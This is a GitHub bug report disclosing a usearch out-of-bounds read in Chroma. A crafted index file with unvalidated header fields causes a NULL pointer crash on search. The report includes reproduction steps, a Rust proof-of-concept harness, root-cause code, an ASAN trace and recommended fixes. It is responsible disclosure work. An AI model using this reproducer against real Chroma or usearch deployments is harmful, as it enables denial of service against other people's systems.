Skip to content

[Bug]: usearch Out-of-Bounds Read via Malicious Index File #7002

@raefko

Description

@raefko

What happened?

usearch Out-of-Bounds Read via Malicious Index File

Author(s): Nabih — Fuzzing Labs (nabih@fuzzinglabs.com)
Date: 2026-05-01


Executive Summary

A maliciously crafted usearch index file can trigger an out-of-bounds memory read leading to a NULL pointer dereference and deterministic application crash (Denial of Service) when loaded and then searched by Chroma. The root cause is that the serialized index format stores matrix_rows (node count) and matrix_cols (bytes per vector) as untrusted 32-bit fields; usearch's load_from_stream accepts these values verbatim with no cross-validation against the caller-supplied IndexOptions, causing vectors_lookup_ entries to become NULL. A subsequent search call passes that NULL pointer as the b_scalars argument to the NEON SIMD dot-product kernel, which immediately faults on the zero page.

ASAN confirms the crash (PID 63499): x[1] = 0x0000000000000000 is the NULL b_scalars pointer; x[0] = 0x0000602000000130 is the valid query vector (a_scalars); x[2] = 0x2 is count_scalars (dims = 2). The crash is deterministic and reproduces on every run against the provided artifact.


Vulnerability Details

  • Severity: High (CVSS 7.5 — AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)
  • CWE: CWE-125 (Out-of-Bounds Read), CWE-476 (NULL Pointer Dereference), CWE-20 (Improper Input Validation)
  • Affected Component: usearch C++ library — include/usearch/index_dense.hpp, function load_from_stream(); crash site: simsimd_dot_f32_neon() (binary offset +0x14c)
Component Version Notes
chroma-index (Rust crate) All versions using usearch feature Direct consumer of usearch::Index::load_from_buffer
usearch (Rust bindings + C++ library) = 2.23 (pinned) Root cause in C++ library
unum-cloud/usearch (upstream C++) Confirmed in v2.x include/usearch/index_dense.hpp, load_from_stream
simsimd (transitive dep) 6.x Crash site: simsimd_dot_f32_neon

Environment

  • Distro Version: macOS/AArch64 (Apple M-series)
  • Additional Details: chroma-core/chroma repository — rust/index/fuzz/ crate; usearch 2.23 pinned in Cargo.toml

Steps to Reproduce

  1. Clone the Chroma repository and enter the fuzz crate:
    git clone https://github.com/chroma-core/chroma
    cd chroma/rust/index/fuzz
  2. Build with ASAN: RUSTFLAGS="-Zsanitizer=address" cargo +nightly build --bin poc_asan_test --target aarch64-apple-darwin
  3. Run against the provided crash artifact:
    ./target/aarch64-apple-darwin/debug/poc_asan_test \
        artifacts/fuzz_load_from_buffer/crash-1434c73f8820300eb2302038c4a4c557f4f172b9 \
        2

Proof of Concept

use usearch::{Index, IndexOptions, MetricKind, ScalarKind};

fn main() {
    let args: Vec<String> = std::env::args().collect();
    if args.len() < 2 {
        eprintln!("Usage: {} <crafted_binary> [dims] [metric]", args[0]);
        std::process::exit(1);
    }

    let path = &args[1];
    let dims: usize = args.get(2).and_then(|s| s.parse().ok()).unwrap_or(8);
    let metric = match args.get(3).map(|s| s.as_str()) {
        Some("cos") => MetricKind::Cos,
        Some("l2") => MetricKind::L2sq,
        _ => MetricKind::IP,
    };

    let data = std::fs::read(path).unwrap_or_else(|e| {
        eprintln!("Failed to read {}: {}", path, e);
        std::process::exit(1);
    });

    let node_count = u32::from_le_bytes(data[0..4].try_into().unwrap());
    let byte_size  = u32::from_le_bytes(data[4..8].try_into().unwrap());
    println!("Header: node_count={}, byte_size={}", node_count, byte_size);

    let options = IndexOptions {
        dimensions: dims,
        metric,
        quantization: ScalarKind::F32,
        connectivity: 32,
        expansion_add: 128,
        expansion_search: 64,
        multi: false,
    };

    let index = Index::new(&options).unwrap();

    println!("Calling load_from_buffer...");
    match index.load_from_buffer(&data) {
        Ok(_) => {
            println!("Loaded OK: size={}, capacity={}", index.size(), index.capacity());
            let query = vec![1.0f32; dims];
            println!("Calling search({} dims, k=10)...", dims);
            match index.search(&query, 10) {        // <-- CRASH: b_scalars=NULL in SIMD kernel
                Ok(r) => println!("Search OK: {} results", r.keys.len()),
                Err(e) => println!("Search error: {}", e),
            }
        }
        Err(e) => println!("Load failed: {}", e),
    }
}

Root Cause Analysis

The serialized usearch dense index format begins with two attacker-controlled 32-bit fields:

Offset  0..3  : matrix_rows (u32 LE) — number of stored vectors
Offset  4..7  : matrix_cols (u32 LE) — bytes per vector (dims × sizeof(scalar))
Offset  8..N  : raw vector data      — matrix_rows × matrix_cols bytes
Offset  N..   : "usearch" magic + HNSW header + graph adjacency data

Inside index_dense.hpp (~line 1101), load_from_stream reads these fields and uses them directly:

std::uint32_t dimensions[2];
input(&dimensions, sizeof(dimensions));
matrix_rows = dimensions[0];   // attacker-controlled
matrix_cols = dimensions[1];   // attacker-controlled

vectors_lookup_ = vectors_lookup_t(matrix_rows);

for (std::uint64_t slot = 0; slot != matrix_rows; ++slot) {
    byte_t* vector = vectors_tape_allocator_.allocate(matrix_cols);
    input(vector, matrix_cols);
    vectors_lookup_[slot] = vector;    // stores raw pointer — may be NULL if matrix_cols=0
}

Neither field is validated against metric_.bytes_per_vector() or the actual buffer length. When matrix_cols is inconsistent with the graph section that follows, vectors_lookup_ entries end up NULL. During search, the metric proxy fetches the stored pointer by graph-node slot and passes it as b_scalars to the SIMD kernel. ASAN confirms this pointer is 0x0 at x[1], causing a READ fault on the zero page inside simsimd_dot_f32_neon.


Detailed Behavior

load_from_buffer returns Ok(()) reporting size=16, capacity=16 — the index appears healthy. The crash occurs only on the first search call, making the load boundary ineffective as a detection point.

RUSTFLAGS="-Zsanitizer=address" cargo +nightly build \
    --bin poc_asan_test --target aarch64-apple-darwin && \
./target/aarch64-apple-darwin/debug/poc_asan_test \
    artifacts/fuzz_load_from_buffer/crash-1434c73f8820300eb2302038c4a4c557f4f172b9 \
    2
AddressSanitizer:DEADLYSIGNAL
=================================================================
==63499==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x000104d02450 bp 0x00016b11be30 sp 0x00016b11be20 T0)
==63499==The signal is caused by a READ memory access.
==63499==Hint: address points to the zero page.
    #0 0x000104d02450 in simsimd_dot_f32_neon(float const*, float const*, unsigned long long, double*)+0x14c (poc_asan_test:arm64+0x100022450)
    #1 0x000104cf94e4 in bool unum::usearch::index_gt<...>::search_to_find_in_base_<...>(...) const+0x454 (poc_asan_test:arm64+0x1000194e4)
    #2 0x000104cf8dfc in unum::usearch::index_gt<...>::search_result_t unum::usearch::index_gt<...>::search<...>(...) const+0x1ac (poc_asan_test:arm64+0x100018dfc)
    #3 0x000104cf8be4 in unum::usearch::index_dense_gt<...>::search_result_t unum::usearch::index_dense_gt<...>::search_<float, ...>(...) const+0xdc (poc_asan_test:arm64+0x100018be4)
    #4 0x000104cf1958 in Matches search_<float>(...)+0x180 (poc_asan_test:arm64+0x100011958)
    #5 0x000104cf17c0 in NativeIndex::search_f32(rust::cxxbridge1::Slice<float const>, unsigned long) const+0x50 (poc_asan_test:arm64+0x1000117c0)
    #6 0x000104cf122c in cxxbridge1$194$NativeIndex$search_f32+0x18 (poc_asan_test:arm64+0x10001122c)
    #7 0x000104cec72c in usearch::ffi::NativeIndex::search_f32::hf7202973838dba99+0x1f4 (poc_asan_test:arm64+0x10000c72c)
    #8 0x000104ceb930 in _$LT$f32$u20$as$u20$usearch..VectorType$GT$::search::h252537b2eebe9ad0+0x44 (poc_asan_test:arm64+0x10000b930)
    #9 0x000104ceb5ec in usearch::Index::search::h950c1e77d154d0b2 lib.rs:1144
   #10 0x000104ce5dc4 in poc_asan_test::main::h6b9971fd57940859 poc_asan_test.rs:68
   #11 0x000104ce0f94 in core::ops::function::FnOnce::call_once::hdb553c66484e4abe function.rs:250
   #12 0x000104ce7f34 in std::sys::backtrace::__rust_begin_short_backtrace::h0fa6ff76a94e7bea backtrace.rs:158
   #13 0x000104ce6d78 in std::rt::lang_start::{{closure}}::h845c899ffc3a2359 rt.rs:206
   #14 0x000104d24e50 in std::rt::lang_start_internal::h5feb7ac2538e01ae+0x3fc (poc_asan_test:arm64+0x100044e50)
   #15 0x000104ce6cac in std::rt::lang_start::h855a994d46e40637 rt.rs:205
   #16 0x000104ce6518 in main+0x20 (poc_asan_test:arm64+0x100006518)

==63499==Register values:
 x[0] = 0x0000602000000130   x[1] = 0x0000000000000000   x[2] = 0x0000000000000002   x[3] = 0x000000016b11be28
 x[4] = 0x0000612000000240   x[5] = 0x0000000000000001  x[19] = 0x000061d000000080  x[20] = 0x0000000000000040
x[24] = 0x0000614000000040  x[25] = 0x0000000000000100  x[26] = 0x000061d0000000b0

SUMMARY: AddressSanitizer: SEGV (poc_asan_test:arm64+0x100022450) in simsimd_dot_f32_neon(float const*, float const*, unsigned long long, double*)+0x14c
==63499==ABORTING

The register dump maps directly onto the SIMD kernel's AArch64 calling convention:

  • x[0] = 0x0000602000000130a_scalars: the query vector, heap-allocated and valid
  • x[1] = 0x0000000000000000b_scalars: the stored-vector pointer from vectors_lookup_[slot], NULL due to the corrupted header; this is the faulting address
  • x[2] = 0x2count_scalars: 2, matching the dims=2 argument passed to the PoC

The fault is a READ at address 0x0 on the first loop iteration of simsimd_dot_f32_neon. The crash is fully deterministic — there is no write, so this is a pure read primitive with a fixed NULL crash address.


Recommendations

  1. Short-term (Chroma-side): Add a validation wrapper around load_from_buffer in chroma-index before forwarding to usearch — verify matrix_cols == expected_dims * scalar_bytes and 8 + matrix_rows * matrix_cols <= data.len(). Return a ChromaError on any violation.
  2. Long-term (upstream usearch): Fix load_from_stream in include/usearch/index_dense.hpp to reject any buffer where matrix_cols != metric_.bytes_per_vector(). Apply the same check to the view (memory-mapped) path where matrix_cols * slot can reference memory outside the mapped region.
  3. Defense-in-depth: Apply integrity verification (HMAC or content-hash) to index files stored in object storage before loading. Consider running the index-loading worker in a sandboxed subprocess (e.g., seccomp) to contain crashes. Enable ASAN in CI fuzz runs to catch regressions.

Metadata

Metadata

Assignees

No one assigned

    Labels

    bugSomething isn't working

    Type

    No type
    No fields configured for issues without a type.

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions